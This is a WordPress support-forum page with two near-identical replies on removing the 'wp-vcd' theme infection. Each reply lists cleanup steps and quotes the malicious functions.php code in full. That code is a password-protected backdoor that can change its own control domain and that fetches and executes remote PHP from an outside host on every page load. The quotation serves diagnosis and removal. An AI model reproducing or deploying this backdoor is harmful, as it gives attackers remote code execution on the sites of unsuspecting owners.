Hanif Shakil
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: /tmp/theme_temp_setup what is thisSome update
a. Rename your all theme
b. Login your site
c. Active akismet plugin (free)
d. Install IP2Location Country Blocker — WordPress Plugins and selected -Block all countries except countries listed below.
e. Go to wp-includes
Delete the following file
1. wp-feed
2. wp-vcd.php
3. class.wp.php
f. Remove functions.php (all of your theme) top php following code & rename (old name) your theme, active your main theme
————————————————————————–
<?phpif (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ‘[redacted]’))
{
$div_code_name=”wp_vcd”;
switch ($_REQUEST[‘action’])
{case ‘change_domain’;
if (isset($_REQUEST[‘newdomain’]))
{if (!empty($_REQUEST[‘newdomain’]))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all(‘/\$tmpcontent = @file_get_contents\(“http:\/\/(.*)\/code4\.php/i’,$file,$matcholddomain))
{$file = preg_replace(‘/’.$matcholddomain[1][0].’/i’,$_REQUEST[‘newdomain’], $file);
@file_put_contents(__FILE__, $file);
print “true”;
}}
}
}
break;default: print “ERROR_WP_ACTION WP_V_CD WP_CD”;
}die(“”);
}if ( ! function_exists( ‘theme_temp_setup’ ) ) {
$path=$_SERVER[‘HTTP_HOST’].$_SERVER[REQUEST_URI];
if ( stripos($_SERVER[‘REQUEST_URI’], ‘wp-cron.php’) == false && stripos($_SERVER[‘REQUEST_URI’], ‘xmlrpc.php’) == false) {if($tmpcontent = @file_get_contents(“https://www.spekt.cc/code4.php?i=”.$path))
{function theme_temp_setup($phpCode) {
$tmpfname = tempnam(sys_get_temp_dir(), “theme_temp_setup”);
$handle = fopen($tmpfname, “w+”);
fwrite($handle, “<?php\n” . $phpCode);
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}extract(theme_temp_setup($tmpcontent));
}
}
}?>
———————————————————————Forum: Fixing WordPress
In reply to: /tmp/theme_temp_setup what is this1. Rename your all theme
2. Login your site
3. Active akismet plugin (free)
4. Install IP2Location Country Blocker — WordPress Plugins and selected -Block all countries except countries listed below.
5. Remove functions.php (all of your theme) top php following code & rename (old name) your theme, active your main theme
————————————————————————–
<?phpif (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ‘[redacted]’))
{
$div_code_name=”wp_vcd”;
switch ($_REQUEST[‘action’])
{case ‘change_domain’;
if (isset($_REQUEST[‘newdomain’]))
{if (!empty($_REQUEST[‘newdomain’]))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all(‘/\$tmpcontent = @file_get_contents\(“http:\/\/(.*)\/code4\.php/i’,$file,$matcholddomain))
{$file = preg_replace(‘/’.$matcholddomain[1][0].’/i’,$_REQUEST[‘newdomain’], $file);
@file_put_contents(__FILE__, $file);
print “true”;
}}
}
}
break;default: print “ERROR_WP_ACTION WP_V_CD WP_CD”;
}die(“”);
}if ( ! function_exists( ‘theme_temp_setup’ ) ) {
$path=$_SERVER[‘HTTP_HOST’].$_SERVER[REQUEST_URI];
if ( stripos($_SERVER[‘REQUEST_URI’], ‘wp-cron.php’) == false && stripos($_SERVER[‘REQUEST_URI’], ‘xmlrpc.php’) == false) {if($tmpcontent = @file_get_contents(“https://www.spekt.cc/code4.php?i=”.$path))
{function theme_temp_setup($phpCode) {
$tmpfname = tempnam(sys_get_temp_dir(), “theme_temp_setup”);
$handle = fopen($tmpfname, “w+”);
fwrite($handle, “<?php\n” . $phpCode);
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}extract(theme_temp_setup($tmpcontent));
}
}
}?>
———————————————————————- This reply was modified 7 years ago by Andrew Nevins.